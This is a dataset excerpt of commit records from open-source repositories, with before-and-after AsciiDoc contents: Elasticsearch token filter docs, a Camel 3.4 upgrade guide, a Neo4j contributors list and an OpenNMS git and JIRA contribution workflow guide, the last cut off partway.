]\n--------------------------------------------------\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n[source,console-result]\n--------------------------------------------------\n{\n \"tokens\" : [\n {\n \"token\" : \"THE\",\n \"start_offset\" : 0,\n \"end_offset\" : 3,\n \"type\" : \"<ALPHANUM>\",\n \"position\" : 0\n },\n {\n \"token\" : \"QUICK\",\n \"start_offset\" : 4,\n \"end_offset\" : 9,\n \"type\" : \"<ALPHANUM>\",\n \"position\" : 1\n },\n {\n \"token\" : \"FOX\",\n \"start_offset\" : 10,\n \"end_offset\" : 13,\n \"type\" : \"<ALPHANUM>\",\n \"position\" : 2\n },\n {\n \"token\" : \"JUMPS\",\n \"start_offset\" : 14,\n \"end_offset\" : 19,\n \"type\" : \"<ALPHANUM>\",\n \"position\" : 3\n }\n ]\n}\n--------------------------------------------------\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n\n[[analysis-uppercase-tokenfilter-analyzer-ex]]\n==== Add to an analyzer\n\nThe following <<indices-create-index,create index API>> request uses the\n`uppercase` filter to configure a new \n<<analysis-custom-analyzer,custom analyzer>>.\n\n[source,console]\n--------------------------------------------------\nPUT uppercase_example\n{\n \"settings\" : {\n \"analysis\" : {\n \"analyzer\" : {\n \"whitespace_uppercase\" : {\n \"tokenizer\" : \"whitespace\",\n \"filter\" : [\"uppercase\"]\n }\n }\n }\n }\n}\n--------------------------------------------------\n","old_contents":"[[analysis-uppercase-tokenfilter]]\n=== Uppercase token filter\n++++\n<titleabbrev>Uppercase<\/titleabbrev>\n++++\n\nA token filter of type `uppercase` that normalizes token text to upper\ncase.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5bf00232b6ad3572f2c815e8db2c17e6fc5b35c3","subject":"CAMEL-15164: camel-lra-starter - Use same keys in auto configuration as camel-main: camel.service.lra -> camel.lra","message":"CAMEL-15164: camel-lra-starter - Use same keys in auto configuration as camel-main: camel.service.lra -> camel.lra\n","repos":"nicolaferraro\/camel,gnodet\/camel,tadayosi\/camel,christophd\/camel,tdiesler\/camel,mcollovati\/camel,pmoerenhout\/camel,pmoerenhout\/camel,cunningt\/camel,christophd\/camel,cunningt\/camel,apache\/camel,cunningt\/camel,adessaigne\/camel,mcollovati\/camel,tdiesler\/camel,pax95\/camel,pmoerenhout\/camel,gnodet\/camel,christophd\/camel,alvinkwekel\/camel,pax95\/camel,adessaigne\/camel,pax95\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,apache\/camel,pmoerenhout\/camel,tdiesler\/camel,tdiesler\/camel,pax95\/camel,tdiesler\/camel,nicolaferraro\/camel,christophd\/camel,gnodet\/camel,apache\/camel,alvinkwekel\/camel,gnodet\/camel,nikhilvibhav\/camel,tadayosi\/camel,gnodet\/camel,cunningt\/camel,tdiesler\/camel,tadayosi\/camel,nicolaferraro\/camel,pmoerenhout\/camel,mcollovati\/camel,mcollovati\/camel,pax95\/camel,tadayosi\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,tadayosi\/camel,adessaigne\/camel,apache\/camel,cunningt\/camel,pax95\/camel,christophd\/camel,adessaigne\/camel,adessaigne\/camel,cunningt\/camel,nicolaferraro\/camel,tadayosi\/camel,nikhilvibhav\/camel,apache\/camel,pmoerenhout\/camel,adessaigne\/camel,apache\/camel,christophd\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_4.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/camel-3x-upgrade-guide-3_4.adoc","new_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. For example if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfrom both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.3 to 3.4\n\n=== camel-test and JMX\n\nThe `camel-test` module no longer has dependency on `camel-management` out of the box.\nIn Camel JMX is optional and to use JMX then `camel-management` must be added as dependency.\n\nFor example to use JMX during testing you the following dependency as test scope:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-management<\/artifactId>\n <scope>test<\/scope>\n<\/dependency>\n----\n\n=== Health Check\n\nThe default health check implementation has been moved out of `camel-base` into `camel-health` as a separate module.\nThe health check has been refactored and there are some APIs and classes that has been changed.\nThe health check in `camel-consul` has been removed.\n\nThe old health check was not fully implemented and was only targeting Spring Boot.\nThe new system is more generic and supports all Camel runtimes.\n\nAn example is provided in `camel-example-main-health`.\n\n=== Template components\n\nThe template components which allows access to the current `Exchange` and `CamelContext` API\nfrom the context map available for templating has now been restricted to only the message body and headers.\n\nThis option can be enabled (`allowContextMapAll=true`) for full access to the current Exchange and CamelContext.\nDoing so impose a potential security risk as this opens access to the full power of CamelContext API.\n\nThis applies to the following templating components: camel-freemarker, camel-velocity, camel-mvel, camel-mustache,\ncamel-string-template, camel-chunk, camel-robotframework.\n\n=== Using custom language in RouteBuilder\n\nThe Java DSL `RouteBuilder` allows referring to a custom language as shown below:\n\n[source,java]\n----\nfrom(\"direct:start\")\n .filter(language(\"foo\", \"Bla bla bla\"))\n .to(\"mock:camel\");\n----\n\nThis functionality is seldom in use, as you would use the provided languages from Camel.\nIf using, then the `language` method now requires a static import as shown below:\n\n[source,java]\n----\nimport static org.apache.camel.builder.Builder.language;\n----\n\n=== camel-spring-boot\n\nThe `\/actuator\/camelroutes` HTTP endpoint has been removed from provided Spring Boot actuators in `camel-spring-boot`.\nThis actuator was becoming problematic to maintain during Spring Boot upgrades due to changes in Spring Boot.\n\n=== camel-servlet and camel-http-common\n\n`HttpRegistry` and `DefaultHttpRegistry` classes from camel-servlet are moved from camel-servlet into camel-http-common.\n`HttpRegistryProvider` is added and used in `DefaultHttpRegistry` instead of `CamelServlet`.\n\nThese changes had effects on camel-atmosphere-websocket and camel-servlet and also camel-resteasy.\nUsers of these components where they would have custom implemetations on `DefaultHttpRegistry` and using `CamelServlet` class should take this change into account.\n\n=== camel-sql\n\nThe `JdbcAggregationRepository` optimistic locking feature has been fixed to work on a distributed environment and every database.\nThere is a new `version` column that is required and must be added to the repository:\n\n[source,sql]\n----\nCREATE TABLE aggregation (\n id varchar(255) NOT NULL,\n exchange blob NOT NULL,\n version BIGINT NOT NULL,\n constraint aggregation_pk PRIMARY KEY (id)\n);\nCREATE TABLE aggregation_completed (\n id varchar(255) NOT NULL,\n exchange blob NOT NULL,\n version BIGINT NOT NULL,\n constraint aggregation_completed_pk PRIMARY KEY (id)\n);\n----\n\n=== camel-lra-starter\n\nThe Spring Boot LRA starter component have changed its auto configuration keys to be similar to using camel-lra with camel-main or camel-quarkus.\nChange the keys from `camel.service.lra` to `camel.lra`, eg `camel.service.lra.coordinator-url` to `camel.lra.coordinator-url`.\n\n=== Maven Archetypes\n\nThe `camel-archetype-java8` has been removed, as you can just use `camel-archetype-java` instead.\n\n=== Camel-Kafka\n\nFrom a lot of time, the headerFilterStrategy application in consumer and producer was done in an interchanged way. You need to have a look at the following issue for more information: https:\/\/issues.apache.org\/jira\/browse\/CAMEL-15121\n\n","old_contents":"= Apache Camel 3.x Upgrade Guide\n\nThis document is for helping you upgrade your Apache Camel application\nfrom Camel 3.x to 3.y. For example if you are upgrading Camel 3.0 to 3.2, then you should follow the guides\nfrom both 3.0 to 3.1 and 3.1 to 3.2.\n\n== Upgrading Camel 3.3 to 3.4\n\n=== camel-test and JMX\n\nThe `camel-test` module no longer has dependency on `camel-management` out of the box.\nIn Camel JMX is optional and to use JMX then `camel-management` must be added as dependency.\n\nFor example to use JMX during testing you the following dependency as test scope:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-management<\/artifactId>\n <scope>test<\/scope>\n<\/dependency>\n----\n\n=== Health Check\n\nThe default health check implementation has been moved out of `camel-base` into `camel-health` as a separate module.\nThe health check has been refactored and there are some APIs and classes that has been changed.\nThe health check in `camel-consul` has been removed.\n\nThe old health check was not fully implemented and was only targeting Spring Boot.\nThe new system is more generic and supports all Camel runtimes.\n\nAn example is provided in `camel-example-main-health`.\n\n=== Template components\n\nThe template components which allows access to the current `Exchange` and `CamelContext` API\nfrom the context map available for templating has now been restricted to only the message body and headers.\n\nThis option can be enabled (`allowContextMapAll=true`) for full access to the current Exchange and CamelContext.\nDoing so impose a potential security risk as this opens access to the full power of CamelContext API.\n\nThis applies to the following templating components: camel-freemarker, camel-velocity, camel-mvel, camel-mustache,\ncamel-string-template, camel-chunk, camel-robotframework.\n\n=== Using custom language in RouteBuilder\n\nThe Java DSL `RouteBuilder` allows referring to a custom language as shown below:\n\n[source,java]\n----\nfrom(\"direct:start\")\n .filter(language(\"foo\", \"Bla bla bla\"))\n .to(\"mock:camel\");\n----\n\nThis functionality is seldom in use, as you would use the provided languages from Camel.\nIf using, then the `language` method now requires a static import as shown below:\n\n[source,java]\n----\nimport static org.apache.camel.builder.Builder.language;\n----\n\n=== camel-spring-boot\n\nThe `\/actuator\/camelroutes` HTTP endpoint has been removed from provided Spring Boot actuators in `camel-spring-boot`.\nThis actuator was becoming problematic to maintain during Spring Boot upgrades due to changes in Spring Boot.\n\n=== camel-servlet and camel-http-common\n\n`HttpRegistry` and `DefaultHttpRegistry` classes from camel-servlet are moved from camel-servlet into camel-http-common.\n`HttpRegistryProvider` is added and used in `DefaultHttpRegistry` instead of `CamelServlet`.\n\nThese changes had effects on camel-atmosphere-websocket and camel-servlet and also camel-resteasy.\nUsers of these components where they would have custom implemetations on `DefaultHttpRegistry` and using `CamelServlet` class should take this change into account.\n\n=== camel-sql\n\nThe `JdbcAggregationRepository` optimistic locking feature has been fixed to work on a distributed environment and every database.\nThere is a new `version` column that is required and must be added to the repository:\n\n[source,sql]\n----\nCREATE TABLE aggregation (\n id varchar(255) NOT NULL,\n exchange blob NOT NULL,\n version BIGINT NOT NULL,\n constraint aggregation_pk PRIMARY KEY (id)\n);\nCREATE TABLE aggregation_completed (\n id varchar(255) NOT NULL,\n exchange blob NOT NULL,\n version BIGINT NOT NULL,\n constraint aggregation_completed_pk PRIMARY KEY (id)\n);\n----\n\n=== Maven Archetypes\n\nThe `camel-archetype-java8` has been removed, as you can just use `camel-archetype-java` instead.\n\n=== Camel-Kafka\n\nFrom a lot of time, the headerFilterStrategy application in consumer and producer was done in an interchanged way. You need to have a look at the following issue for more information: https:\/\/issues.apache.org\/jira\/browse\/CAMEL-15121\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"77305211e6b49cfe2ef4a852423b1652e496ffa3","subject":"Adding @AlexanderYastrebov","message":"Adding @AlexanderYastrebov\n\nWelcome @AlexanderYastrebov as a Neo4j contributor!","repos":"HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j,HuangLS\/neo4j","old_file":"manual\/src\/main\/resources\/community\/contributors.asciidoc","new_file":"manual\/src\/main\/resources\/community\/contributors.asciidoc","new_contents":"[[contributors]]\nContributors\n============\n\nAs an Open Source Project, the Neo4j User community extends its warmest thanks to all the contributors who have signed the <<cla>> to date and are contributing to this collective effort.\n\n[options=\"header\"]\n|=======\n|name | GIThub ID\n|Johan Svensson | https:\/\/github.com\/johan-neo[johan-neo]\n|Emil Eifrem | https:\/\/github.com\/emileifrem[emileifrem]\n|Peter Neubauer | https:\/\/github.com\/peterneubauer[peterneubauer]\n|Mattias Persson | https:\/\/github.com\/tinwelint[tinwelint]\n|Tobias Lindaaker | https:\/\/github.com\/thobe[thobe]\n|Anders Nawroth | https:\/\/github.com\/nawroth[nawroth]\n|Andr\u00e9s Taylor |https:\/\/github.com\/systay[systay]\n|Jacob Hansson |https:\/\/github.com\/jakewins[jakewins]\n|Jim Webber |https:\/\/github.com\/jimwebber[jimwebber]\n|Josh Adell |https:\/\/github.com\/jadell[jadell]\n|Andreas Kollegger |https:\/\/github.com\/akollegger[akollegger]\n|Chris Gioran |https:\/\/github.com\/digitalstain[digitalstain]\n|Thomas Baum |https:\/\/github.com\/tbaum[tbaum]\n|Alistair Jones |https:\/\/github.com\/apcj[apcj]\n|Michael Hunger |https:\/\/github.com\/jexp[jexp]\n|Jesper Nilsson |https:\/\/github.com\/jespernilsson[jespernilsson]\n|Tom Sulston |https:\/\/github.com\/tomsulston[tomsulston]\n|David Montag |https:\/\/github.com\/dmontag[dmontag]\n|Marlon Richert |https:\/\/github.com\/marlonrichert[marlonrichert]\n|Hugo Josefson |https:\/\/github.com\/hugojosefson[hugojosefson]\n|Vivek Prahlad |https:\/\/github.com\/vivekprahlad[vivekprahlad]\n|Adriano Almeida |https:\/\/github.com\/adrianoalmeida7[adrianoalmeida7]\n|Benjamin Gehrels |https:\/\/github.com\/BGehrels[BGehrels]\n|Christopher Schmidt |https:\/\/github.com\/FaKod[FaKod]\n|Pascal Rehfeldt |https:\/\/github.com\/prehfeldt[prehfeldt]\n|Bj\u00f6rn S\u00f6derqvist |https:\/\/github.com\/cybear[cybear]\n|Abdul Azeez Shaik |https:\/\/github.com\/abdulazeezsk[abdulazeezsk]\n|James Thornton |https:\/\/github.com\/espeed[espeed]\n|Radhakrishna Kalyan |https:\/\/github.com\/nrkkalyan[nrkkalyan]\n|Michel van den Berg |https:\/\/github.com\/promontis[promontis]\n|Brandon McCauslin |https:\/\/github.com\/bm3780[bm3780]\n|Hendy Irawan |https:\/\/github.com\/ceefour[ceefour]\n|Luanne Misquitta |https:\/\/github.com\/luanne[luanne]\n|Jim Radford |https:\/\/github.com\/radford[radford]\n|Axel Morgner |https:\/\/github.com\/amorgner[amorgner]\n|Taylor Buley |https:\/\/github.com\/editor[editor]\n|Alex Smirnov |https:\/\/github.com\/alexsmirnov[alexsmirnov]\n|Johannes Mockenhaupt |https:\/\/github.com\/jotomo[jotomo]\n|Pablo Pareja Tobes |https:\/\/github.com\/pablopareja[pablopareja]\n|Bj\u00f6rn Granvik |https:\/\/github.com\/bjorngranvik[bjorngranvik]\n|Julian Simpson|https:\/\/github.com\/simpsonjulian[simpsonjulian]\n|Pablo Pareja Tobes |https:\/\/github.com\/pablopareja[pablopareja]\n|Rickard \u00d6berg |https:\/\/github.com\/rickardoberg[rickardoberg]\n|Stefan Armbruster |https:\/\/github.com\/sarmbruster[sarmbruster]\n|Stephan Hagemann |https:\/\/github.com\/shageman[shageman]\n|Linan Wang |https:\/\/github.com\/wangii[wangii]\n|Ian Robinson|https:\/\/github.com\/iansrobinson[iansrobinson]\n|Marko Rodriguez |https:\/\/github.com\/okram[okram]\n|Saikat Kanjilal |https:\/\/github.com\/skanjila[skanjila]\n|Craig Taverner |https:\/\/github.com\/craigtaverner[craigtaverner]\n|David Winslow |https:\/\/github.com\/dwins[dwins]\n|Patrick Fitzgerald |https:\/\/github.com\/paddydub[paddydub]\n|Stefan Berder |https:\/\/github.com\/hrbonz[hrbonz]\n|Michael Kanner |https:\/\/github.com\/SepiaGroup[SepiaGroup]\n|Lin Zhemin |https:\/\/github.com\/miaoski[miaoski]\n|Christophe Willemsen |https:\/\/github.com\/kwattro[kwattro]\n|Tony Liu |https:\/\/github.com\/kooyeed[kooyeed]\n|Michael Klishin |https:\/\/github.com\/michaelklishin[michaelklishin]\n|Wes Freeman |https:\/\/github.com\/wfreeman[wfreeman]\n|Chris Leishman |https:\/\/github.com\/chrisleishman[chrisleishman] \n|Brian Levine |https:\/\/github.com\/blevine[blevine]\n|Ben Day |https:\/\/github.com\/benday280412[benday280412]\n|Davide Savazzi |https:\/\/github.com\/svzdvd[svzdvd]\n|Nigel Small |https:\/\/github.com\/nigelsmall[nigelsmall]\n|Lasse Westh-Nielsen |https:\/\/github.com\/lassewesth[lassewesth]\n|Wujek Srujek |https:\/\/github.com\/wujek-srujek[wujek-srujek]\n|Alexander Yastrebov |https:\/\/github.com\/AlexanderYastrebov[AlexanderYastrebov]\n|=======\n\n","old_contents":"[[contributors]]\nContributors\n============\n\nAs an Open Source Project, the Neo4j User community extends its warmest thanks to all the contributors who have signed the <<cla>> to date and are contributing to this collective effort.\n\n[options=\"header\"]\n|=======\n|name | GIThub ID\n|Johan Svensson | https:\/\/github.com\/johan-neo[johan-neo]\n|Emil Eifrem | https:\/\/github.com\/emileifrem[emileifrem]\n|Peter Neubauer | https:\/\/github.com\/peterneubauer[peterneubauer]\n|Mattias Persson | https:\/\/github.com\/tinwelint[tinwelint]\n|Tobias Lindaaker | https:\/\/github.com\/thobe[thobe]\n|Anders Nawroth | https:\/\/github.com\/nawroth[nawroth]\n|Andr\u00e9s Taylor |https:\/\/github.com\/systay[systay]\n|Jacob Hansson |https:\/\/github.com\/jakewins[jakewins]\n|Jim Webber |https:\/\/github.com\/jimwebber[jimwebber]\n|Josh Adell |https:\/\/github.com\/jadell[jadell]\n|Andreas Kollegger |https:\/\/github.com\/akollegger[akollegger]\n|Chris Gioran |https:\/\/github.com\/digitalstain[digitalstain]\n|Thomas Baum |https:\/\/github.com\/tbaum[tbaum]\n|Alistair Jones |https:\/\/github.com\/apcj[apcj]\n|Michael Hunger |https:\/\/github.com\/jexp[jexp]\n|Jesper Nilsson |https:\/\/github.com\/jespernilsson[jespernilsson]\n|Tom Sulston |https:\/\/github.com\/tomsulston[tomsulston]\n|David Montag |https:\/\/github.com\/dmontag[dmontag]\n|Marlon Richert |https:\/\/github.com\/marlonrichert[marlonrichert]\n|Hugo Josefson |https:\/\/github.com\/hugojosefson[hugojosefson]\n|Vivek Prahlad |https:\/\/github.com\/vivekprahlad[vivekprahlad]\n|Adriano Almeida |https:\/\/github.com\/adrianoalmeida7[adrianoalmeida7]\n|Benjamin Gehrels |https:\/\/github.com\/BGehrels[BGehrels]\n|Christopher Schmidt |https:\/\/github.com\/FaKod[FaKod]\n|Pascal Rehfeldt |https:\/\/github.com\/prehfeldt[prehfeldt]\n|Bj\u00f6rn S\u00f6derqvist |https:\/\/github.com\/cybear[cybear]\n|Abdul Azeez Shaik |https:\/\/github.com\/abdulazeezsk[abdulazeezsk]\n|James Thornton |https:\/\/github.com\/espeed[espeed]\n|Radhakrishna Kalyan |https:\/\/github.com\/nrkkalyan[nrkkalyan]\n|Michel van den Berg |https:\/\/github.com\/promontis[promontis]\n|Brandon McCauslin |https:\/\/github.com\/bm3780[bm3780]\n|Hendy Irawan |https:\/\/github.com\/ceefour[ceefour]\n|Luanne Misquitta |https:\/\/github.com\/luanne[luanne]\n|Jim Radford |https:\/\/github.com\/radford[radford]\n|Axel Morgner |https:\/\/github.com\/amorgner[amorgner]\n|Taylor Buley |https:\/\/github.com\/editor[editor]\n|Alex Smirnov |https:\/\/github.com\/alexsmirnov[alexsmirnov]\n|Johannes Mockenhaupt |https:\/\/github.com\/jotomo[jotomo]\n|Pablo Pareja Tobes |https:\/\/github.com\/pablopareja[pablopareja]\n|Bj\u00f6rn Granvik |https:\/\/github.com\/bjorngranvik[bjorngranvik]\n|Julian Simpson|https:\/\/github.com\/simpsonjulian[simpsonjulian]\n|Pablo Pareja Tobes |https:\/\/github.com\/pablopareja[pablopareja]\n|Rickard \u00d6berg |https:\/\/github.com\/rickardoberg[rickardoberg]\n|Stefan Armbruster |https:\/\/github.com\/sarmbruster[sarmbruster]\n|Stephan Hagemann |https:\/\/github.com\/shageman[shageman]\n|Linan Wang |https:\/\/github.com\/wangii[wangii]\n|Ian Robinson|https:\/\/github.com\/iansrobinson[iansrobinson]\n|Marko Rodriguez |https:\/\/github.com\/okram[okram]\n|Saikat Kanjilal |https:\/\/github.com\/skanjila[skanjila]\n|Craig Taverner |https:\/\/github.com\/craigtaverner[craigtaverner]\n|David Winslow |https:\/\/github.com\/dwins[dwins]\n|Patrick Fitzgerald |https:\/\/github.com\/paddydub[paddydub]\n|Stefan Berder |https:\/\/github.com\/hrbonz[hrbonz]\n|Michael Kanner |https:\/\/github.com\/SepiaGroup[SepiaGroup]\n|Lin Zhemin |https:\/\/github.com\/miaoski[miaoski]\n|Christophe Willemsen |https:\/\/github.com\/kwattro[kwattro]\n|Tony Liu |https:\/\/github.com\/kooyeed[kooyeed]\n|Michael Klishin |https:\/\/github.com\/michaelklishin[michaelklishin]\n|Wes Freeman |https:\/\/github.com\/wfreeman[wfreeman]\n|Chris Leishman |https:\/\/github.com\/chrisleishman[chrisleishman] \n|Brian Levine |https:\/\/github.com\/blevine[blevine]\n|Ben Day |https:\/\/github.com\/benday280412[benday280412]\n|Davide Savazzi |https:\/\/github.com\/svzdvd[svzdvd]\n|Nigel Small |https:\/\/github.com\/nigelsmall[nigelsmall]\n|Lasse Westh-Nielsen |https:\/\/github.com\/lassewesth[lassewesth]\n|Wujek Srujek |https:\/\/github.com\/wujek-srujek[wujek-srujek]\n|=======\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"64c3f297bbdde9cbbc2bcbce0b20cf3bda918cf3","subject":"Revert \"Fixed and enhanced\"","message":"Revert \"Fixed and enhanced\"\n","repos":"rdkgit\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,aihua\/opennms,aihua\/opennms,rdkgit\/opennms","old_file":"opennms-doc\/guide-doc\/src\/asciidoc\/text\/git-workflow.adoc","new_file":"opennms-doc\/guide-doc\/src\/asciidoc\/text\/git-workflow.adoc","new_contents":"\n== Issues in JIRA and GitHub workflow\n\nChanges in the official documentation and code base are tracked by JIRA - the link:http:\/\/issues.opennms.org[issue tracker] of OpenNMS.\nThis is the main tool in the project to organize tasks and plan releases.\nWhen a new version of OpenNMS is released, all issues are reflected in the release notes.\n\nIt is required to have link:http:\/\/issues.opennms.org\/secure\/Signup!default.jspa[JIRA account] for creating and commenting issues and a link:https:\/\/github.com\/join[GitHub account] for giving your contribution as _Pull Request_.\n\nThe main workflow to add or fix something is defined as the following:\n\n. Create an issue in JIRA.\n The issue number is a unique identifier and is used as a reference, e.g. NMS-7214\n. link:https:\/\/help.github.com\/articles\/fork-a-repo[Fork] OpenNMS to your private GitHub repository\n. Create a feature branch from `develop` with the following name schema: `NMS-<number>-<Your-Issue-Headline>`\n. Add a link of your working branch to your JIRA issue and allow others to help\n. Create or fix documentation\n. When you've finished, send a _Pull Request_ of your changes to the OpenNMS repository\n. Add a review header in your _Pull Request_ comment message\n. Add a link with to the _Pull Request_ and ask for a review\n. If the review is worked in, the _Pull Request_ will be merged into the codebase and is now in the official release cycle.\n\n=== Example workflow creating documentation\n\nThe following example describes a workflow how to create a new documentation for the _DnsMonitor_.\n\n * Everything starts with an JIRA issue\n\n[[guide-doc-gitflow-create-issue]]\n.Create or pick an issue\nimage::..\/images\/01_pick-issue.png[]\n\n * Fork the OpenNMS project in your GitHub repository.\n * Go to your GitHub account with your repositories and create working branch from _develop_, which is the default so you don't have to change anything.\n * Create a working branch for the JIRA issue you want to work on with the given name schema:\n\n NMS-<number>-docs-<Subject-without-spaces>\n\nFor our example: `NMS-6634-docs-DnsMonitor`.\nThis name is used later in the _Pull Request_ and helps to identify and track changes driven by this issue.\nType in the name in the input field and GitHub create the branch for you.\n\n.Create a working branch for the JIRA issue in your repository\nimage::..\/images\/02_create-branch-from-dev.png[]\n\n.Create a link in the JIRA issue to your working branch, it indicates somebody is working on it.\nimage::..\/images\/03_link-to-working-branch.png[]\n\nThere are two ways to work on the issue.\n\n * _Option 1_: Make a local copy and work on your local computer\n * _Option 2_: Edit directly all the files online in the GitHub web editor\n\n==== Work on your computer locally\n\nTo work on your local computer link:http:\/\/git-scm.com[_git_] or the link:https:\/\/windows.github.com[_GitHub GUI_] is required.\nClone your repository to you local computer with\n\n git clone https:\/\/github.com\/<your-github-nick>\/opennms.git\n\nIt will download the repository with all the branches to your local system in the 'opennms' directory.\nBy default you are in the _develop_ branch of OpenNMS.\nYou can switch to your previously created working branch with the following command:\n\n git checkout -b NMS-6634-docs-DnsMonitor origin\/NMS-6634-docs-DnsMonitor\n\nYou can show list all existing branches with\n\n git branch -r\n\nNow you have your working branch where you can start your contribution.\n\n.Create the documentation and save it!\nimage::..\/images\/04_your-contribution.png[]\n\nThe command `git status` gives you all changes.\nTo add your work to the version controlled history you have to add your changes to a commit.\nIn our example we have created the 'DnsMonitor.adoc' file and it is shown as currently untracked in git.\n\nThe command\n\n git add DnsMonitor.adoc\n\nadds this file for the next commit.\n\nNOTE: The full path to the file to add depends on your current location in the file system.\n\n.Add your created or modified files with git add.\nimage::..\/images\/05_add-to-git.png[]\n\nWrite a comment which explains what you did.\nThe first line in the commit message is used as a subject line and should contain the JIRA issue number and the JIRA issue subject.\nAfter the subject keep one empty line and you can use bullet points to describe your changes\n\n.Git comment with a subject line and bullet points for the description\nimage::..\/images\/06_git-comment.png[]\n\nThe commit with your change is now stored in the local history of your repository.\nWith the following command you can upload your changes to your GitHub repository.\n\n git push\n\n.Upload your changes to your GitHub repository\nimage::..\/images\/07_git-push.png[]\n\nNOTE: Upload changes to your repository doesn't have any effect on the project.\n You can use it as your backup and to stage your working progress.\n It also allows others to help you in your current working branch.\n\nThe next step is sending your changes to the official OpenNMS repository described in section <<guidedoc-gitflow-send-pull-request>>.\n\n==== Work with the GitHub Web editor\n\nIt is possible to work completely on the GitHub editor.\n\nWARNING: Be careful if you don't have a reliable internet connection.\n It could be possible you loose the content in case of connection loss.\n\nYou can create a new file your repository as following:\n\n.Create a new file with the `+` in (1)\nimage::..\/images\/13_web-create-new-file.png[]\n\n.Set a file name and create content and a commit message\nimage::..\/images\/14_web_filename-content-commit.png[]\n\n. File name to create in our case a new documentation file with the name 'DnsMonitor.adoc'\n. Documentation in _AsciiDoc_ format\n. Subject for the commit message with `NMS-<number>-docs-<Subject-without-spaces>`\n. Short information about your change\n\nYou can commit the change directly online by clicking on _Commit changes_ on the bottom end of the page.\n\nThe next step is sending your changes to the official OpenNMS repository described in section <<guidedoc-gitflow-send-pull-request>>.\n\n[[guidedoc-gitflow-send-pull-request]]\n==== Send the Pull Request\n\nIf you have finished, it's time to create a _Pull Request_ to indicate your contribution should go in the official OpenNMS codebase.\nCommit and push all your changes to your GitHub repository.\nCreate a _Pull Request_ from the GitHub web application with click on _Compare & pull request_.\nThe _Pull Request_ will be created automatically against the correct _develop_ branch.\n\n.Click on _Compare & pull request_\nimage::..\/images\/08_compare-branches.png[]\n\nGitHub will use your last git commit message for the _Pull Request_.\nAdd to your commit message the following information:\n\n----\nJIRA: http:\/\/issues.opennms.org\/browse\/NMS-6634\n\nTodo Review:\n- [ ] Typo and grammar\n- [ ] Formatting and conventions\n- [ ] Content\n----\n\nThis comment creates a review status indicator for the review.\n\n.Create a review status indicator in your _Pull Request_ message\nimage::..\/images\/09_create-review-indicator.png[]\n\nTo indicate you need a review set a link for the _Pull Request_ in the JIRA issue.\n\n.Create a link with a review request in the JIRA issue\nimage::..\/images\/10_doc-pull-request-issue.png[]\n\nReviewer can add annotations lines in your contributed changes.\nYou can work in this comments by just making your changes in your working branch, commit and push them to your repository.\nGitHub will automatically add this commits to your pull requests.\nIf the status for _Content_, _Formatting and conventions_ and _Typo and grammar_ is finished, the _Pull Request_ will be merged to the official OpenNMS code base.\n\nNOTE: You will be notified if a reviewer adds comments or request changes through the GitHub.\n\nIf your _Pull Request_ is merged you will be also notified and the status of your outstanding _Pull Request_ changes to status _Merged_ on your GitHub profile page.\n\n.Status of pull requests is indicated on your GitHub profile page\nimage::..\/images\/11_merged-pull-request.png[]\n\nThe OpenNMS Continuous Integration system based on _Bamboo_ picks up the merged pull request and starts a build and deploys a version with your changes automatically.\nYou can see the build jobs on the public available link:http:\/\/bamboo.internal.opennms.com:8085\/allPlans.action[Bamboo system].\n","old_contents":"\n== Issues in JIRA and GitHub workflow\n\nChanges in the official documentation and code base are tracked by JIRA - the link:http:\/\/issues.opennms.org[issue tracker] of OpenNMS.\nThis is the main tool in the project to organize tasks and plan releases.\nWhen a new version of OpenNMS is released, all issues are reflected in the release notes.\n\nIt is required to have link:http:\/\/issues.opennms.org\/secure\/Signup!default.jspa[JIRA account] for creating and commenting issues and a link:https:\/\/github.com\/join[GitHub account] for giving your contribution as _Pull Request_.\n\nThe main workflow to add or fix something is defined as the following:\n\n. Create an issue in JIRA.\n The issue number is a unique identifier and is used as a reference, e.g. NMS-7214\n. link:https:\/\/help.github.com\/articles\/fork-a-repo[Fork] OpenNMS to your private GitHub repository\n. Create a feature branch from `develop` with the following name schema: `NMS-<number>-<Your-Issue-Headline>`\n. Add a link of your working branch to your JIRA issue and allow others to help\n. Create or fix documentation\n. When you've finished, send a _Pull Request_ of your changes to the OpenNMS repository\n. Add a review header in your _Pull Request_ comment message\n. Add a link with to the _Pull Request_ and ask for a review\n. If the review is worked in, the _Pull Request_ will be merged into the codebase and is now in the official release cycle.\n\n=== Example workflow creating documentation\n\nThe following example describes a workflow how to create a new documentation for the _DnsMonitor_.\n\n * Everything starts with an JIRA issue\n\n[[guide-doc-gitflow-create-issue]]\n.Create or pick an issue\nimage::..\/images\/01_pick-issue.png[]\n\n * Fork the OpenNMS project in your GitHub repository.\n * Go to your GitHub account with your repositories and create working branch from _develop_, which is the default so you don't have to change anything.\n * Create a working branch for the JIRA issue you want to work on with the given name schema:\n\n NMS-<number>-docs-<Subject-without-spaces>\n\nFor our example: 